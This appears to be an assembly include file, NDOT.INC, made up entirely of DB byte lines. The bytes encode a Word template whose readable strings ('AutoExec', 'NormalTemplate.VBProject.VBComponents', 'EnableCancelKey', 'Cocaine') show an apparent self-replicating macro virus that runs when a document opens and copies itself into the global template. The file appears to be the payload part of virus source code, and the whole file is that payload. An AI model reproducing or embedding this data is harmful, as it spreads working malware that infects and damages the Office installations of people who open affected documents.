DB 0FFH,023H,094H,024H,0CAH,002H,00CH,053H,04DH,033H,024H,000H,002H,00CH,063H
|
|||
|
DB 0B5H,053H,005H,003H,00CH,0B3H,015H,003H,0E8H,003H,00CH,043H,0A9H,043H,05DH
|
|||
|
DB 003H,00CH,0DDH,0A2H,003H,030H,090H,003H,049H,002H,030H,0B3H,019H,0A0H,006H
|
|||
|
DB 00CH,003H,018H,0C8H,003H,00CH,080H,008H,000H,003H,060H,0D8H,002H,00CH,026H
|
|||
|
DB 03EH,004H,002H,024H,032H,055H,000H,0E0H,002H,00CH,000H,080H,009H,003H,006H
|
|||
|
DB 002H,0DCH,012H,048H,00AH,00CH,003H,0F6H,001H,001H,012H,004H,0F0H,002H,01CH
|
|||
|
DB 08FH,004H,004H,070H,000H,0C1H,000H,01CH,002H,013H,014H,0AFH,000H,020H,000H
|
|||
|
DB 01EH,060H,028H,002H,028H,000H,020H,002H,002H,01DH,002H,003H,020H,000H,024H
|
|||
|
DB 002H,005H,012H,022H,004H,012H,0F7H,000H,080H,080H,020H,000H,026H,002H,0F6H
|
|||
|
DB 000H,0A4H,022H,0BFH,020H,000H,028H,002H,021H,000H,02AH,002H,004H,082H,009H
|
|||
|
DB 02CH,002H,004H,02EH,002H,08BH,000H,000H,004H,018H,005H,01CH,026H,002H,007H
|
|||
|
DB 020H,025H,000H,02CH,002H,000H,000H,001H,000H,021H,000H,030H,002H,025H,000H
|
|||
|
DB 032H,002H,002H,000H,0AEH,000H,008H,000H,000H,0A8H,027H,043H,06FH,063H,061H
|
|||
|
DB 069H,06EH,065H,005H,000H,094H,0A2H,020H,093H,002H,07EH,067H,032H,0A1H,08CH
|
|||
|
DB 040H,053H,000H,007H,060H,0A3H,03BH,00CH,000H,058H,002H,02CH,00EH,000H,063H
|
|||
|
DB 03AH,05CH,063H,005H,02EH,02EH,030H,020H,073H,079H,073H,01DH,002H,082H,009H
|
|||
|
DB 078H,042H,040H,034H,002H,001H,000H,040H,004H,014H,042H,040H,06BH,00FH,022H
|
|||
|
DB 0D8H,092H,0BBH,063H,092H,033H,09BH,002H,052H,013H,056H,06CH,002H,0FCH,063H
|
|||
|
DB 083H,003H,0F2H,013H,072H,001H,0A7H,0B1H,000H,000H,000H,041H,074H,074H,072H
|
|||
|
DB 069H,062H,075H,074H,000H,065H,020H,056H,042H,05FH,04EH,061H,081H,000H,092H
|
|||
|
DB 0EFH,020H,03DH,020H,022H,054H,068H,072H,084H,044H,06FH,063H,075H,06DH,065H
|
|||
|
DB 06EH,010H,000H,000H,074H,022H,00DH,00AH,00AH,08CH,042H,061H,073H,001H,002H
|
|||
|
DB 08CH,030H,07BH,030H,030H,000H,000H,030H,032H,030H,050H,039H,030H,036H,02DH
|
|||
|
DB 000H,010H,030H,003H,008H,043H,007H,000H,000H,000H,014H,002H,012H,001H,024H
|
|||
|
DB 030H,030H,034H,036H,07DH,001H,00DH,07CH,043H,072H,065H,000H,000H,061H,074H
|
|||
|
DB 061H,062H,082H,06CH,001H,086H,046H,061H,06CH,073H,065H,00CH,05EH,000H,000H
|
|||
|
DB 000H,050H,072H,065H,064H,065H,063H,06CH,061H,089H,000H,006H,049H,064H,000H
|
|||
|
DB 08BH,054H,000H,000H,072H,075H,00DH,022H,040H,045H,078H,070H,06FH,073H,065H
|
|||
|
DB 014H,01CH,054H,000H,065H,000H,000H,06DH,070H,06CH,061H,074H,065H,044H,030H
|
|||
|
DB 065H,072H,069H,076H,002H,024H,011H,065H,000H,000H,043H,075H,0C0H,073H,074H
|
|||
|
DB 06FH,06DH,069H,07AH,004H,088H,003H,032H,000H,053H,075H,000H,000H,062H,020H
|
|||
|
DB 041H,075H,074H,06FH,000H,045H,078H,065H,063H,028H,029H,00DH,00AH,000H,000H
|
|||
|
DB 000H,04FH,06EH,020H,045H,072H,072H,06FH,072H,080H,020H,047H,06FH,054H,06FH
|
|||
|
DB 020H,065H,000H,000H,000H,005H,001H,080H,055H,070H,070H,06CH,069H,063H,061H
|
|||
|
DB 074H,080H,069H,06FH,06EH,000H,000H,02EH,044H,069H,073H,000H,035H,080H,079H
|
|||
|
DB 041H,06CH,065H,072H,074H,073H,000H,055H,000H,000H,013H,005H,034H,008H,011H
|
|||
|
DB 045H,06EH,081H,030H,043H,061H,06EH,040H,063H,065H,06CH,000H,000H,04BH,065H
|
|||
|
DB 079H,000H,012H,077H,086H,064H,000H,01BH,001H,00AH,064H,00DH,00AH,046H,000H
|
|||
|
DB 000H,080H,02DH,012H,069H,080H,009H,031H,020H,080H,02FH,04EH,06FH,072H,008H
|
|||
|
DB 06DH,061H,000H,000H,06CH,005H,05FH,02EH,056H,042H,050H,040H,072H,06FH,06AH
|
|||
|
DB 065H,063H,074H,080H,004H,000H,000H,043H,020H,06FH,06DH,070H,06FH,06EH,080H
|
|||
|
DB 0C5H,073H,02EH,000H,043H,06FH,075H,06EH,000H,000H,074H,00DH,00AH,049H,044H
|
|||
|
DB 066H,020H,0A2H,017H,028H,069H,029H,000H,019H,064H,000H,000H,004H,065H,04DH
|
|||
|
DB 06FH,064H,075H,06CH,065H,02EH,000H,04CH,012H,0C5H,073H,028H,031H,02CH,008H
|
|||
|
DB 040H,000H,020H,031H,029H,000H,03BH,022H,012H,0D8H,004H,063H,061H,080H,004H
|
|||
|
DB 022H,020H,054H,068H,000H,000H,065H,002H,06EH,089H,039H,04EH,065H,078H,074H
|
|||
|
DB 020H,069H,014H,00DH,00AH,023H,025H,000H,042H,049H,080H,027H,072H,074H,020H
|
|||
|
DB 040H,028H,022H,013H,0D1H,083H,014H,02EH,030H,012H,0CEH,022H,000H,000H,0C0H
|
|||
|
DB 050H,00CH,010H,053H,061H,006H,076H,040H,073H,081H,052H,03AH,00DH,00AH,045H
|
|||
|
DB 000H,000H,06EH,024H,064H,020H,0C0H,05CH,00DH,00AH,041H,000H,0D0H,0CFH,011H
|
|||
|
DB 0E0H,0A1H,0B1H,008H,008H,01AH,0E1H,000H,00EH,001H,03EH,000H,003H,000H,0FEH
|
|||
|
DB 0FFH,009H,039H,05DH,000H,0CCH,061H,05EH,081H,00CH,053H,04FH,0FFH,016H,004H
|
|||
|
DB 000H,000H,009H,002H,004H,0E4H,004H,047H,049H,003H,017H,005H,000H,002H,000H
|
|||
|
DB 000H,0AEH,02CH,001H,02AH,000H,05CH,000H,047H,000H,07BH,042H,05BH,053H,00CH
|
|||
|
DB 053H,048H,034H,0C2H,0EEH,046H,05CH,03EH,0F3H,020H,003H,01AH,003H,004H,02DH
|
|||
|
DB 000H,05FH,048H,003H,016H,009H,004H,055H,048H,023H,000H,033H,000H,02EH,002H
|
|||
|
DB 050H,023H,000H,028H,000H,039H,000H,023H,002H,032H,03AH,002H,062H,041H,000H
|
|||
|
DB 052H,000H,051H,000H,055H,000H,049H,000H,0A8H,00AH,056H,000H,04FH,0B2H,046H
|
|||
|
DB 020H,0B2H,05AH,045H,022H,09DH,050H,002H,018H,04FH,002H,080H,052H,000H,041H
|
|||
|
DB 000H,05AH,055H,04DH,002H,004H,053H,00FH,02CH,004H,02CH,043H,002H,034H,04DH
|
|||
|
DB 002H,03EH,04EH,002H,00EH,05CH,002H,028H,049H,002H,056H,052H,055H,0B5H,002H
|
|||
|
DB 014H,053H,002H,004H,046H,0A2H,026H,020H,002H,018H,048H,002H,03EH,052H,002H
|
|||
|
DB 0BAH,044H,002H,042H,0A5H,0B8H,05CH,002H,06CH,02AH,0BAH,042H,002H,016H,033H
|
|||
|
DB 002H,090H,032H,002H,092H,044H,000H,04CH,002H,002H,023H,002H,016H,022H,0D0H
|
|||
|
DB 0C2H,058H,061H,0D2H,058H,0A2H,08AH,020H,0A2H,0E2H,061H,000H,073H,0A2H,066H
|
|||
|
DB 063H,002H,08EH,046H,0A2H,068H,072H,002H,008H,041H,000H,070H,002H,002H,098H
|
|||
|
DB 0FAH,06CH,000H,05FH,002H,02CH,003H,042H,05FH,000H,005H,0A8H,04AH,002H,060H
|
|||
|
DB 043H,002H,070H,01EH,079H,00FH,00FH,008H,010H,0A2H,080H,0BFH,0EAH,032H,067H
|
|||
|
DB 033H,063H,005H,004H,008H,019H,00FH,009H,00AH,010H,01BH,002H,00CH,07AH,0B6H
|
|||
|
DB 0ADH,064H,002H,098H,072H,002H,010H,00FH,003H,00FH,010H,0FBH,0E5H,00FH,010H
|
|||
|
DB 007H,010H,008H,012H,0E2H,005H,07AH,005H,006H,007H,018H,00FH,008H,00BH,010H
|
|||
|
DB 049H,002H,00DH,084H,002H,002H,005H,002H,003H,00DH,0F6H,078H,0EFH,077H,000H
|
|||
|
DB 06DH,002H,014H,00FH,003H,00FH,010H,00BH,010H,014H,00FH,080H,00BH,01DH,00FH
|
|||
|
DB 00CH,006H,010H,054H,002H,008H,0A3H,0D8H,002H,007H,05FH,07FH,01FH,076H,003H
|
|||
|
DB 013H,00FH,004H,00FH,010H,00CH,010H,010H,0D2H,080H,006H,002H,012H,063H,00FH
|
|||
|
DB 013H,002H,002H,00BH,00FH,003H,00FH,010H,022H,066H,000H,044H,0D5H,000H,052H
|
|||
|
DB 036H,027H,069H,000H,063H,0D2H,082H,074H,012H,086H,06FH,0D2H,0EAH,073H,00CH
|
|||
|
DB 02CH,020H,03FH,03AH,022H,0F2H,0FDH,005H,083H,082H,035H,03FH,03AH,002H,018H
|
|||
|
DB 083H,08CH,03FH,03AH,039H,036H,003H,00AH,037H,03AH,038H,022H,0A8H,030H,000H
|
|||
|
DB 023H,000H,034H,023H,0A2H,002H,036H,03BH,03EH,072H,000H,071H,022H,0B2H,069H
|
|||
|
DB 000H,076H,022H,0A2H,073H,000H,020H,0F2H,094H,065H,002H,006H,0EAH,045H,050H
|
|||
|
DB 0E4H,01CH,067H,002H,006H,061H,012H,09CH,023H,0C8H,033H,01EH,003H,0B6H,072H
|
|||
|
DB 004H,028H,06FH,000H,066H,052H,0F3H,020H,0ADH,01AH,032H,026H,066H,002H,00AH
|
|||
|
DB 003H,018H,065H,032H,01EH,04FH,002H,00CH,066H,002H,0D4H,063H,062H,013H,003H
|
|||
|
DB 030H,053H,000H,057H,0ADH,056H,002H,022H,052H,032H,092H,003H,07EH,04FH,032H
|
|||
|
DB 024H,042H,002H,082H,04DH,004H,022H,00DH,048H,057H,002H,056H,072H,002H,07CH
|
|||
|
DB 020H,00AH,056H,000H,003H,02AH,030H,002H,082H,04FH,000H,062H,000H,06AH,002H
|
|||
|
DB 048H,063H,05BH,020H,002H,03AH,069H,002H,010H,072H,0A7H,0FEH,012H,034H,0F3H
|
|||
|
DB 0AEH,01BH,02FH,0B8H,000H,04FH,068H,030H,002H,0E4H,033H,002H,0E6H,099H,092H
|
|||
|
DB 00BH,00AH,01FH,02EH,013H,024H,009H,004H,017H,02EH,0A7H,01AH,033H,0D6H,013H
|
|||
|
DB 02EH,003H,004H,043H,000H,043H,068H,057H,042H,062H,04EH,002H,0CAH,04FH,002H
|
|||
|
DB 0D4H,043H,04CH,053H,000H,059H,055H,0EDH,042H,01CH,054H,032H,0B8H,04DH,002H
|
|||
|
DB 0FAH,053H,032H,0BCH,044H,002H,0ECH,04CH,002H,010H,003H,03CH,054H,002H,0B2H
|
|||
|
DB 003H,0ECH,003H,0F4H,0D5H,005H,043H,08EH,041H,012H,064H,074H,002H,0E4H,06DH
|
|||
|
DB 002H,0C2H,017H,0F6H,00BH,0C6H,0E0H,008H,0C6H,041H,000H,046H,000H,035H,054H
|
|||
|
DB 0D5H,000H,031H,002H,0C4H,031H,0A2H,03CH,032H,012H,0F4H,042H,012H,014H,035H
|
|||
|
DB 042H,06AH,02DH,002H,016H,031H,002H,082H,005H,014H,0AAH,0EDH,043H,052H,004H
|
|||
|
DB 044H,002H,01EH,034H,002H,02AH,034H,002H,032H,003H,022H,035H,002H,00CH,007H
|
|||
|
DB 0CCH,07DH,012H,06AH,003H,08AH,003H,0C2H,06BH,0A3H,003H,004H,00FH,0C6H,057H
|
|||
|
DB 002H,0BEH,05CH,002H,004H,00BH,0C6H,04DH,002H,010H,045H,0AAH,06DH,000H,073H
|
|||
|
DB 022H,030H,054H,002H,0ECH,036H,037H,044H,002H,048H,01FH,0B2H,074H,012H,0A0H
|
|||
|
DB 009H,028H,020H,000H,005H,068H,023H,00EH,01FH,0B4H,062H,024H,042H,01DH,0B4H
|
|||
|
DB 001H,000H,0AAH,056H,0E4H,008H,0EEH,033H,052H,070H,032H,002H,0D4H,044H,002H
|
|||
|
DB 0F6H,038H,002H,048H,063H,008H,046H,012H,044H,037H,002H,0DAH,031H,055H,0EBH
|
|||
|
DB 002H,0F0H,044H,004H,014H,042H,002H,026H,041H,002H,0DCH,02DH,002H,004H,003H
|
|||
|
DB 0F0H,035H,002H,0F0H,033H,002H,004H,023H,0CCH,005H,0F0H,06FH,0DBH,00FH,0EEH
|
|||
|
DB 00FH,0EEH,005H,0EEH,015H,0AEH,050H,012H,0B0H,053H,0C8H,045H,002H,008H,00FH
|
|||
|
DB 0F2H,045H,092H,001H,00FH,0F2H,06FH,022H,0D6H,00FH,0F2H,007H,000H,00FH,0F2H
|
|||
|
DB 02FH,0A6H,00FH,0F2H,000H,000H,0E1H,02EH,045H,00DH,08FH,0E0H,01AH,010H,085H
|
|||
|
DB 02EH,002H,000H,056H,060H,08CH,04DH,00BH,0B4H,000H,000H,01CH,001H,027H,0BAH
|
|||
|
DB 013H,002H,046H,012H,0E6H,044H,022H,0B6H,034H,055H,0D5H,002H,0ECH,02DH,002H
|
|||
|
DB 0DCH,042H,012H,012H,041H,014H,006H,030H,012H,008H,042H,002H,00AH,042H,012H
|
|||
|
DB 028H,045H,002H,01AH,025H,0CEH,0AEH,05FH,041H,062H,080H,003H,0FCH,013H,010H
|
|||
|
DB 044H,012H,032H,035H,012H,02AH,01FH,006H,015H,006H,07FH,022H,07FH,022H,07BH
|
|||
|
DB 022H,04DH,022H,0E6H,043H,0EBH,055H,074H,03AH,079H,002H,04FH,002H,08AH,046H
|
|||
|
DB 004H,018H,013H,032H,00DH,00EH,013H,040H,04FH,022H,08AH,037H,022H,02EH,044H
|
|||
|
DB 022H,0F4H,04CH,06FH,017H,02FH,02EH,016H,03CH,04BH,01AH,03FH,0E4H,065H,052H
|
|||
|
DB 00CH,013H,060H,04CH,042H,018H,02FH,030H,035H,024H,001H,052H,0EEH,003H,000H
|
|||
|
DB 004H,050H,0FFH,002H,000H,000H,006H,0A2H,07BH,008H,002H,008H,016H,0D6H,00BH
|
|||
|
DB 003H,020H,0B2H,069H,0D6H,062H,053H,08AH,00FH,004H,00FH,010H,00FH,010H,03DH
|
|||
|
DB 0A8H,005H,010H,000H,074H,04EH,056H,09DH,003H,055H,008H,004H,08DH,09AH,001H
|
|||
|
DB 000H,018H,032H,0DEH,068H,002H,09EH,073H,012H,082H,02AH,000H,06FH,002H,0AEH
|
|||
|
DB 075H,052H,014H,065H,052H,0B8H,074H,000H,00AH,000H,032H,033H,036H,064H,064H
|
|||
|
DB 061H,008H,06FH,032H,031H,039H,092H,024H,02AH,044H,001H,011H,002H,099H,0F3H
|
|||
|
DB 04CH,004H,040H,002H,0A9H,000H,0F3H,01AH,005H,064H,001H,0FEH,0FFH,001H,0B3H
|
|||
|
DB 0E3H,005H,00CH,00FH,006H,00FH,010H,00FH,010H,002H,0E4H,002H,04DH,00FH,016H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
|
|||
|
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,01FH,000H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,003H,010H
|
|||
|
DB 0A3H,098H,0C6H,077H,092H,0D1H,0D2H,011H,0BCH,0A4H,044H,0BCH,006H,045H,053H
|
|||
|
DB 082H,093H,003H,014H,023H,078H,003H,008H,060H,022H,036H,080H,002H,004H,043H
|
|||
|
DB 01CH,01DH,000H,0FFH,000H,020H,000H,000H,028H,000H,000H,004H,004H,057H,06FH
|
|||
|
DB 072H,064H,0B5H,06BH,010H,000H,003H,004H,056H,000H,080H,042H,041H,0F7H,0E2H
|
|||
|
DB 010H,000H,005H,004H,057H,069H,06EH,031H,036H,0C1H,07EH,006H,00BH,010H,000H
|
|||
|
DB 033H,032H,007H,07FH,003H,01FH,04DH,061H,063H,0B3H,0B2H,010H,000H,008H,004H
|
|||
|
DB 050H,072H,001H,000H,0C2H,054H,074H,06FH,031H,03AH,071H,010H,000H,006H,004H
|
|||
|
DB 073H,074H,064H,06FH,06CH,065H,000H,000H,093H,060H,010H,000H,007H,000H,04DH
|
|||
|
DB 053H,046H,06FH,072H,06DH,073H,043H,00FH,010H,028H,010H,000H,00CH,004H,0D2H
|
|||
|
DB 07FH,073H,0D6H,07EH,074H,03CH,09EH,010H,000H,009H,002H,07CH,0FFH,003H,004H
|
|||
|
DB 080H,004H,000H,05FH,045H,076H,061H,06CH,075H,0D2H,02DH,018H,0D9H,003H,040H
|
|||
|
DB 04FH,066H,066H,069H,063H,000H,043H,065H,015H,075H,010H,000H,00FH,004H,054H
|
|||
|
DB 0D6H,047H,004H,062H,063H,074H,081H,045H,002H,055H,004H,084H,045H,04DH,0F3H
|
|||
|
DB 0C2H,099H,06FH,031H,0D4H,012H,003H,07CH,0D3H,045H,045H,0D2H,044H,0ECH,09CH
|
|||
|
DB 010H,002H,0BCH,065H,001H,0E3H,0D2H,042H,051H,05BH,010H,000H,00BH,000H,041H
|
|||
|
DB 0D6H,03BH,0D2H,03AH,0A5H,02AH,010H,0F2H,0AEH,0D2H,03FH,0D2H,092H,009H,018H
|
|||
|
DB 0D6H,03FH,0F4H,0F6H,002H,05EH,000H,045H,06EH,061H,062H,06CH,065H,0D2H,040H
|
|||
|
DB 0D5H,03FH,0EAH,0F3H,010H,019H,000H,032H,061H,077H,064H,002H,02AH,003H,018H
|
|||
|
DB 064H,0FCH,0D3H,010H,000H,001H,000H,069H,060H,010H,010H,038H,00DH,000H,00EH
|
|||
|
DB 000H,0D2H,045H,0D2H,044H,007H,090H,071H,0ACH,002H,0BFH,000H,0D2H,04FH,003H
|
|||
|
DB 0FAH,063H,074H,04FH,068H,00BH,094H,002H,0E0H,002H,00FH,043H,0D4H,053H,065H
|
|||
|
DB 06EH,074H,073H,00AH,027H,012H,02DH,000H,0D4H,058H,030H,076H,003H,057H,0C8H
|
|||
|
DB 024H,043H,06FH,064H,0D6H,052H,0E1H,01CH,003H,01BH,0D4H,056H,0BAH,0CEH,002H
|
|||
|
DB 0F1H,000H,049H,0D2H,088H,072H,074H,004H,06CH,069H,0C5H,002H,0C1H,000H,053H
|
|||
|
DB 061H,076H,065H,092H,0D0H,003H,0D9H,017H,02AH,06AH,002H,086H,032H,0E5H,001H
|
|||
|
DB 0F6H,0BBH,001H,012H,0BDH,0E2H,095H,004H,042H,03AH,047H,08EH,013H,0C4H,005H
|
|||
|
DB 004H,0A2H,01FH,002H,018H,002H,03FH,0B4H,005H,01DH,006H,006H,00CH,002H,01FH
|
|||
|
DB 0A0H,0B6H,0FFH,0FFH,00EH,002H,003H,002H,02AH,011H,002H,02AH,00CH,002H,008H
|
|||
|
DB 003H,01BH,00CH,002H,0DEH,0D3H,046H,012H,024H,00AH,003H,003H,00FH,005H,0D5H
|
|||
|
DB 0A4H,001H,080H,0B2H,080H,001H,000H,0D2H,079H,012H,011H,030H,02AH,002H,002H
|
|||
|
DB 090H,009H,000H,000H,000H,070H,014H,006H,048H,003H,000H,082H,002H,000H,064H
|
|||
|
DB 0E4H,004H,004H,000H,00FH,038H,000H,000H,01CH,000H,017H,01DH,0F2H,01BH,022H
|
|||
|
DB 010H,063H,074H,005H,051H,000H,048H,000H,000H,040H,002H,000H,000H,00AH,006H
|
|||
|
DB 002H,00AH,03DH,0ADH,002H,00AH,007H,002H,07CH,001H,014H,008H,006H,012H,080H
|
|||
|
DB 000H,009H,002H,012H,080H,019H,0A2H,0DDH,0F2H,0CBH,00CH,002H,04AH,012H,03CH
|
|||
|
DB 002H,00AH,016H,028H,02CH,000H,001H,039H,022H,036H,010H,022H,037H,03EH,002H
|
|||
|
DB 019H,073H,092H,0EAH,092H,09BH,06FH,0C2H,0D5H,065H,050H,084H,082H,000H,00DH
|
|||
|
DB 052H,0D2H,025H,05CH,000H,003H,062H,0BCH,047H,0F5H,0A6H,0B0H,034H,033H,030H
|
|||
|
DB 02DH,022H,076H,000H,002H,004H,043H,000H,00AH,003H,002H,00EH,001H,012H,0F4H
|
|||
|
DB 0A5H,023H,000H,032H,02EH,030H,023H,000H,010H,030H,023H,043H,03AH,000H,05CH
|
|||
|
DB 057H,049H,04EH,044H,04FH,057H,092H,036H,053H,059H,053H,008H,000H,054H,045H
|
|||
|
DB 04DH,082H,077H,054H,044H,04FH,04CH,045H,032H,02EH,010H,054H,04CH,042H,023H
|
|||
|
DB 094H,000H,000H,008H,0F2H,07AH,000H,0F2H,08BH,061H,074H,022H,01DH,023H,000H
|
|||
|
DB 02FH,000H,001H,016H,000H,007H,040H,020H,080H,002H,04DH,053H,000H,046H,023H
|
|||
|
DB 0ADH,03EH,000H,00EH,021H,001H,006H,084H,09BH,045H,072H,004H,000H,000H,080H
|
|||
|
DB 083H,09BH,02FH,000H,07AH,080H,009H,006H,070H,080H,001H,001H,046H,041H,046H
|
|||
|
DB 000H,000H,035H,031H,034H,000H,031H,036H,032H,02DH,042H,038H,035H,033H,010H
|
|||
|
DB 02DH,031H,031H,00AH,000H,044H,0F2H,04CH,039H,092H,01BH,034H,034H,034H,035H
|
|||
|
DB 035H,033H,035H,00EH,034H,001H,048H,017H,000H,000H,046H,004H,033H,02EH,054H
|
|||
|
DB 057H,044H,000H,023H,04DH,069H,063H,072H,06FH,073H,06FH,000H,000H,028H,066H
|
|||
|
DB 074H,020H,002H,03DH,020H,000H,060H,020H,04FH,002H,062H,001H,0B0H,020H,000H
|
|||
|
DB 001H,04CH,069H,062H,072H,061H,01CH,072H,079H,062H,0CBH,001H,01EH,050H,030H
|
|||
|
DB 000H,090H,00DH,008H,000H,000H,013H,072H,002H,05FH,050H,033H,043H,032H,044H
|
|||
|
DB 000H,044H,046H,038H,032H,02DH,043H,000H,000H,046H,045H,032H,037H,005H,050H
|
|||
|
DB 041H,034H,01DH,050H,080H,04AH,050H,05CH,090H,056H,000H,00AH,042H,045H,05CH
|
|||
|
DB 085H,028H,045H,058H,0A7H,028H,078H,0DCH,000H,077H,0DDH,083H,081H,095H,043H
|
|||
|
DB 004H,002H,078H,04FH,033H,038H,044H,078H,082H,04FH,040H,075H,0B4H,015H,042H
|
|||
|
DB 078H,02AH,098H,0C0H,02BH,080H,040H,08EH,0C4H,02CH,032H,000H,02CH,044H,0A2H
|
|||
|
DB 0A5H,043H,02DH,035H,042H,046H,041H,092H,0D6H,030H,000H,000H,031H,042H,02DH
|
|||
|
DB 042H,044H,045H,052H,035H,040H,078H,041H,041H,040H,077H,034H,0C0H,000H,000H
|
|||
|
DB 002H,032H,001H,008H,055H,041H,052H,051H,055H,049H,056H,04FH,000H,053H,020H
|
|||
|
DB 044H,000H,020H,045H,020H,050H,052H,04FH,000H,047H,052H,041H,04DH,041H,053H
|
|||
|
DB 05CH,072H,0A3H,043H,052H,000H,000H,04FH,053H,04FH,046H,054H,000H,020H,04FH
|
|||
|
DB 046H,046H,049H,043H,045H,05CH,001H,084H,000H,000H,001H,04DH,053H,04FH,039H
|
|||
|
DB 037H,02EH,044H,00CH,04CH,04CH,048H,05CH,083H,025H,020H,000H,000H,038H,02EH
|
|||
|
DB 030H,045H,092H,05CH,00FH,082H,0BFH,001H,000H,013H,0C2H,001H,08DH,004H,010H
|
|||
|
DB 004H,09AH,019H,042H,0A8H,034H,0EFH,000H,06FH,063H,075H,06DH,032H,011H,01AH
|
|||
|
DB 011H,04EH,004H,032H,000H,004H,000H,018H,040H,033H,054H,000H,068H,011H,040H
|
|||
|
DB 038H,062H,0DAH,080H,08FH,063H,000H,075H,008H,002H,051H,000H,090H,062H,0D9H
|
|||
|
DB 040H,0B6H,01CH,0C0H,006H,062H,0F4H,048H,042H,001H,031H,0C2H,0C4H,000H,000H
|
|||
|
DB 0EBH,000H,0DCH,01EH,08BH,042H,002H,001H,005H,02CH,042H,01AH,08FH,09AH,022H
|
|||
|
DB 042H,000H,009H,008H,00AH,02BH,042H,001H,010H,042H,001H,025H,08AH,01AH,0E1H
|
|||
|
DB 02FH,0A2H,03EH,000H,003H,000H,0B0H,0C6H,0FEH,0FFH,009H,000H,0D3H,020H,007H
|
|||
|
DB 01CH,001H,002H,009H,021H,002H,004H,004H,003H,010H,000H,000H,004H,08CH,006H
|
|||
|
DB 08BH,07FH,000H,002H,069H,07FH,05DH,002H,084H,023H,075H,002H,02EH,00FH,049H
|
|||
|
DB 006H,049H,049H,044H,03DH,022H,07BH,037H,037H,043H,036H,000H,086H,039H,038H
|
|||
|
DB 041H,046H,02DH,044H,031H,039H,032H,013H,0F9H,022H,004H,043H,041H,034H,02DH
|
|||
|
DB 016H,0F9H,084H,062H,034H,030H,002H,001H,07DH,022H,00DH,00AH,037H,0BAH,03DH
|
|||
|
DB 00BH,076H,02FH,026H,048H,002H,01FH,004H,003H,00DH,080H,003H,00AH,04EH,061H
|
|||
|
DB 06DH,065H,03DH,022H,037H,030H,046H,0DDH,002H,03AH,048H,065H,06CH,070H,043H
|
|||
|
DB 06FH,0A0H,000H,06EH,074H,065H,078H,074H,003H,072H,030H,002H,013H,043H,04DH
|
|||
|
DB 047H,03DH,022H,042H,038H,042H,080H,001H,041H,032H,037H,035H,044H,032H,042H
|
|||
|
DB 00BH,004H,002H,01EH,044H,050H,042H,03DH,022H,037H,030H,000H,003H,037H,032H
|
|||
|
DB 045H,046H,031H,030H,046H,030H,005H,004H,002H,018H,047H,043H,03DH,022H,032H
|
|||
|
DB 038H,000H,009H,032H,041H,042H,037H,043H,038H,042H,038H,003H,004H,033H,037H
|
|||
|
DB 002H,017H,00DH,00AH,05BH,048H,000H,000H,06FH,073H,074H,020H,045H,078H,074H
|
|||
|
DB 065H,06EH,064H,065H,072H,020H,049H,06EH,066H,010H,000H,06FH,05DH,00DH,00AH
|
|||
|
DB 008H,09CH,031H,03DH,07BH,033H,038H,033H,032H,044H,036H,034H,030H,009H,000H
|
|||
|
DB 022H,081H,039H,030H,002H,0E6H,043H,046H,02DH,038H,045H,034H,033H,02DH,030H
|
|||
|
DB 030H,041H,030H,000H,014H,043H,039H,031H,031H,030H,030H,035H,041H,07DH,03BH
|
|||
|
DB 022H,08EH,03BH,008H,036H,030H,00DH,00AH,003H,083H,002H,05AH,062H,038H,06BH
|
|||
|
DB 073H,070H,061H,063H,065H,002H,051H,00BH,0FAH,03DH,032H,037H,02CH,020H,003H
|
|||
|
DB 004H,000H,0E0H,036H,032H,033H,02CH,020H,033H,037H,035H,02CH,020H,05AH,00DH
|
|||
|
DB 00AH,01FH,0CEH,012H,07CH,004H,003H,0A3H,091H,01FH,0CEH,003H,015H,001H,000H
|
|||
|
DB 001H,012H,0E2H,003H,0E2H,0FDH,043H,0B0H,006H,009H,002H,003H,015H,000H,0C0H
|
|||
|
DB 004H,006H,018H,044H,000H,046H,01DH,002H,008H,017H,073H,06FH,020H,064H,06FH
|
|||
|
DB 020H,036H,074H,066H,074H,020H,002H,093H,064H,0BCH,02AH,020H,000H,002H,038H
|
|||
|
DB 062H,089H,003H,00CH,002H,027H,000H,022H,00EH,000H,003H,00CH,02EH,002H,00DH
|
|||
|
DB 075H,023H,09BH,02EH,038H,0E0H,0FFH,000H,0F4H,039H,0B2H,071H,002H,046H,008H
|
|||
|
DB 003H,00FH,09DH,056H,02AH,003H,07EH,00FH,004H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,0BFH,082H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,005H,010H,001H,0B2H,0E6H,06FH,0A2H,046H,070H,000H,04FH,000H,062H,0E2H
|
|||
|
DB 0E8H,0EFH,0D7H,008H,0EAH,00FH,009H,00FH,010H,006H,010H,012H,0B2H,012H,005H
|
|||
|
DB 04AH,005H,006H,006H,017H,00FH,007H,00CH,010H,05BH,002H,00EH,06FH,002H,004H
|
|||
|
DB 00FH,003H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H
|
|||
|
DB 006H,007H,014H,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00BH,010H,005H,07AH,005H,006H,0FFH,01FH,00BH,018H,00FH,00CH,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H,006H,007H,014H
|
|||
|
DB 00FH,008H,00FH,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
|
|||
|
|
|||
|
;----------------------------------(NDOT.INC)---------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|